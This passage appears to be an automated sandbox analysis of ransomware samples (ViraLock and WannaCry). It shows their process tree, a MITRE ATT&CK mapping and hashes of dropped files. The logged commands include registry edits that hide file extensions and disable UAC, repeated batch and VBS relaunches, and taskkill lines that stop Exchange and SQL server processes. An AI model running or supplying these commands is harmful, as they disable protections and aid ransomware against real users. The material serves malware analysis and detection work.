        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        34⤵
        
        PID:14852
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        31⤵
        Modifies visibility of file extensions in Explorer
        
        PID:17584
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        31⤵
        
        PID:6336
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        31⤵
        UAC bypass
        
        PID:10104
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CggMQAMs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        31⤵
        
        PID:18624
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        32⤵
        
        PID:19044
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        29⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:13624
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        29⤵
        
        PID:18596
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        29⤵
        UAC bypass
        
        PID:12528
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sSAswUog.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        29⤵
        
        PID:13572
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        30⤵
        
        PID:16124
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        27⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:17972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        27⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:18000
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        27⤵
        UAC bypass
        Modifies registry key
        
        PID:18056
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cswcEYws.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        27⤵
        System Location Discovery: System Language Discovery
        
        PID:13268
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        28⤵
        
        PID:13236
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        25⤵
        Modifies visibility of file extensions in Explorer
        
        PID:17212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        25⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:13912
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        25⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        
        PID:10772
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nGIQwAgs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        25⤵
        System Location Discovery: System Language Discovery
        
        PID:6964
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        26⤵
        
        PID:17428
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        23⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:13516
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        23⤵
        
        PID:13524
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        23⤵
        UAC bypass
        
        PID:13980
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LcsoMowg.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        23⤵
        
        PID:7756
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        24⤵
        System Location Discovery: System Language Discovery
        
        PID:16756
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        21⤵
        Modifies visibility of file extensions in Explorer
        
        PID:16436
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        21⤵
        
        PID:8376
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        21⤵
        UAC bypass
        Modifies registry key
        
        PID:7552
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kiAgIUQI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        21⤵
        
        PID:7452
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        22⤵
        
        PID:12988
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        19⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:17192
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        19⤵
        
        PID:17200
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        19⤵
        UAC bypass
        Modifies registry key
        
        PID:17264
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iMYAMocI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        19⤵
        System Location Discovery: System Language Discovery
        
        PID:29484
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        20⤵
        
        PID:16472
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        17⤵
        Modifies visibility of file extensions in Explorer
        
        PID:19088
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        17⤵
        System Location Discovery: System Language Discovery
        
        PID:14860
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        17⤵
        UAC bypass
        Modifies registry key
        
        PID:12820
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PGIYQcwY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        17⤵
        
        PID:13600
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        18⤵
        
        PID:13352
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        15⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:12700
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        15⤵
        
        PID:3732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        15⤵
        UAC bypass
        
        PID:12296
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TEsMUMwU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        15⤵
        
        PID:12024
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        16⤵
        
        PID:13716
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        13⤵
        Modifies visibility of file extensions in Explorer
        
        PID:13800
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:18536
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        13⤵
        UAC bypass
        
        PID:18524
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FuMEMQos.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        13⤵
        
        PID:18540
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        14⤵
        
        PID:14048
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        11⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:9532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        11⤵
        Modifies registry key
        
        PID:12668
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        11⤵
        UAC bypass
        Modifies registry key
        
        PID:14516
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QKQsAEMQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        11⤵
        
        PID:11472
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        12⤵
        
        PID:18268
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        9⤵
        Modifies visibility of file extensions in Explorer
        
        PID:29584
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        9⤵
        Modifies registry key
        
        PID:12140
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        9⤵
        UAC bypass
        
        PID:2896
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LAoEswAk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        9⤵
        
        PID:11184
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        10⤵
        
        PID:11356
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        7⤵
        Modifies visibility of file extensions in Explorer
        
        PID:16228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        7⤵
        
        PID:18572
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        7⤵
        UAC bypass
        
        PID:12128
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VuoEUgoY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        7⤵
        
        PID:18604
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        8⤵
        
        PID:30064
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        Modifies visibility of file extensions in Explorer
        
        PID:32472
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        
        PID:32576
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:32588
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lusQQgoQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        5⤵
        
        PID:31044
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        6⤵
        
        PID:18868
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:30440
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    - Modifies registry key
    PID:9888
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:10028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XosAkEMA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
    3⤵
    PID:9324
  - - C:\Windows\SysWOW64\cscript.exe
      cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
      4⤵
      System Location Discovery: System Language Discovery
      PID:31220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=121 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13496 /prefetch:1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:16088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7428 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:23080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=14224 /prefetch:8
  2⤵
  - Loads dropped DLL
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:22352
- C:\Users\Admin\Downloads\WannaCry.exe
  "C:\Users\Admin\Downloads\WannaCry.exe"
  2⤵
  - Drops startup file
  - Adds Run key to start application
  PID:5484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 277381732494069.bat
    3⤵
    PID:25304
  - - C:\Windows\SysWOW64\cscript.exe
      cscript //nologo c.vbs
      4⤵
      PID:25436
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe f
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:27528
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im MSExchange*
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:26356
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im Microsoft.Exchange.*
    3⤵
    - Kills process with taskkill
    PID:26776
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sqlserver.exe
    3⤵
    - Kills process with taskkill
    PID:26812
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im sqlwriter.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:26628
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe c
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:28188
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /b !WannaDecryptor!.exe v
    3⤵
    PID:28204
  - - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
      !WannaDecryptor!.exe v
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:32460
- - C:\Users\Admin\Downloads\!WannaDecryptor!.exe
    !WannaDecryptor!.exe
    3⤵
    - Sets desktop wallpaper using registry
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:28260

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3756

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2088

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x000000000000047C 0x000000000000048C
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1692

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:25776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Safe Mode Boot

T1562.009

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Password Policy Discovery

T1201

Peripheral Device Discovery

T1120

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\!WannaDecryptor!.exe.lnk

Filesize
590B

MD5
20fc6cb1c7d641c8796470ed6cf4498c

SHA1
097471fdf16d47af901d7d4375df5ae8d1cb0301

SHA256
01695fddfa529e22dfc72e7e9ed82d89fd590f1495689d4904362f8429402b23

SHA512
084c931beb918ed6c7a25365117882c9d69c260b29bf4626eaaf3727818f7d7be7c22bca2fa664f2102559d863eefacae6f65d2a6fa91232864369224472d323

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id-F737E21E.[[email protected]].ncov

Filesize
3.2MB

MD5
7b5429d6581299be89e99bd1ee3bb371

SHA1
7216616aa4b8b03d8e094e75d695023bdfed03d7

SHA256
d0f4aed25e3b7051a73f8313632d61bd845f31000c80c6b32086f34805801c6f

SHA512
30107bdbf13cd89e79533b15dcf738551b5fb778beeced34f87490d3959a9e80a38aff7bb3bdb31cc2dcf559dc87d8418e514e80bbf0ffc6d41c13f023d61376

Download Submit
C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.exe

Filesize
231KB

MD5
881e0c0b32a5bcd21d50831ed2576c34

SHA1
ff463f77ba7b3091d61619560b18e4f665118606

SHA256
184744847c38bf482d2b3fa8bff07a1bb494fb6bfb5cc920d3135650ec27815f

SHA512
351acdeb3153585852447d2b344d07a5e252ce0c3644d99c32d480775a2ce3f3bba84d9f0dd35b99683b45b4bc4db2bb08a26dc0787fcda15fdf42f8407d3da3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416

Filesize
1KB

MD5
55540a230bdab55187a841cfe1aa1545

SHA1
363e4734f757bdeb89868efe94907774a327695e

SHA256
d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb

SHA512
c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e9a2c784e6d797d91d4b8612e14d51bd

SHA1
25e2b07c396ee82e4404af09424f747fc05f04c2

SHA256
18ddbb93c981d8006071f9d26924ce3357cad212cbb65f48812d4a474c197ce6

SHA512
fc35688ae3cd448ed6b2069d39ce1219612c54f5bb0dd7b707c9e6f39450fe9fb1338cf5bd0b82a45207fac2fbab1e0eae77e5c9e6488371390eab45f76a5df1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
1fc959921446fa3ab5813f75ca4d0235

SHA1
0aeef3ba7ba2aa1f725fca09432d384b06995e2a

SHA256
1b1e89d3b2f3da84cc8494d07cf0babc472c426ccb1c4ae13398243360c9d02c

SHA512
899d1e1b0feece25ac97527daddcaaeb069cb428532477849eba43a627502c590261f2c26fef31e4e20efd3d7eb0815336a784c4d2888e05afcf5477af872b06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
47KB

MD5
0d89f546ebdd5c3eaa275ff1f898174a

SHA1
339ab928a1a5699b3b0c74087baa3ea08ecd59f5

SHA256
939eb90252495d3af66d9ec34c799a5f1b0fc10422a150cf57fc0cd302865a3e

SHA512
26edc1659325b1c5cf6e3f3cd9a38cd696f67c4a7c2d91a5839e8dcbb64c4f8e9ce3222e0f69d860d088c4be01b69da676bdc4517de141f8b551774909c30690

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
67KB

MD5
b275fa8d2d2d768231289d114f48e35f

SHA1
bb96003ff86bd9dedbd2976b1916d87ac6402073

SHA256
1b36ed5c122ad5b79b8cc8455e434ce481e2c0faab6a82726910e60807f178a1

SHA512
d28918346e3fda06cd1e1c5c43d81805b66188a83e8ffcab7c8b19fe695c9ca5e05c7b9808599966df3c4cd81e73728189a131789c94df93c5b2500ce8ec8811

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
62KB

MD5
c813a1b87f1651d642cdcad5fca7a7d8

SHA1
0e6628997674a7dfbeb321b59a6e829d0c2f4478

SHA256
df670e09f278fea1d0684afdcd0392a83d7041585ba5996f7b527974d7d98ec3

SHA512
af0d024ba1faafbd6f950c67977ed126827180a47cea9758ee51a95d13436f753eb5a7aa12a9090048a70328f6e779634c612aebde89b06740ffd770751e1c5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
19KB

MD5
1bd4ae71ef8e69ad4b5ffd8dc7d2dcb5

SHA1
6dd8803e59949c985d6a9df2f26c833041a5178c

SHA256
af18b3681e8e2a1e8dc34c2aa60530dc8d8a9258c4d562cbe20c898d5de98725

SHA512
b3ff083b669aca75549396250e05344ba2f1c021468589f2bd6f1b977b7f11df00f958bbbd22f07708b5d30d0260f39d8de57e75382b3ab8e78a2c41ef428863

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
25KB

MD5
e29b448723134a2db688bf1a3bf70b37

SHA1
3c8eba27ac947808101fa09bfe83723f2ab8d6b0

SHA256
349cc041df29f65fd7ffe2944a8872f66b62653bbfbd1f38ce8e6b7947f99a69

SHA512
4ce801111cb1144cfd903a94fb9630354bf91a5d46bbbe46e820c98949f57d96ec243b655f2edeb252a4ec6a80167be106d71a4b56b402be264c13cc208f3e2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011

Filesize
215KB

MD5
2be38925751dc3580e84c3af3a87f98d

SHA1
8a390d24e6588bef5da1d3db713784c11ca58921

SHA256
1412046f2516b688d644ff26b6c7ef2275b6c8f132eb809bd32e118208a4ec1b

SHA512
1341ffc84f16c1247eb0e9baacd26a70c6b9ee904bc2861e55b092263613c0f09072efd174b3e649a347ef3192ae92d7807cc4f5782f8fd07389703d75c4c4e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016

Filesize
25KB

MD5
3e385ad8ecd56924300cd51a9e880071

SHA1
43593fbfbdbb188d88e659efe2d007d84377e7ea

SHA256
736773de44b8b94e3d2035fde2256b68425f207eafd3c79a46d60629e42fd560

SHA512
b19b5d9fead1bc473e84fe9f9c82b9872f0af7a7964b97bbae76312729e8f3969e2f20636b3b820cbf26f0539283c88afb8471c0b2897814be01d02f167cfc88

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000019

Filesize
73KB

MD5
f83cd9545e3e6894ffc4b239a0fa9568

SHA1
d667c253c57d2d4f110fa1c31d142b0d3a4a4d4a

SHA256
4de6dcbf3d01f0cb39a71e49f93ef061b0718b695e721fa7374e827da9a65815

SHA512
ca63c3834d6c743b4376facb0ad94b9e6a903d431ddb9374e27c144981de62a70431205e84a9a6207589c493e26563bcede9cef64ab0eb35fab4bc171a1a44c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000049

Filesize
22KB

MD5
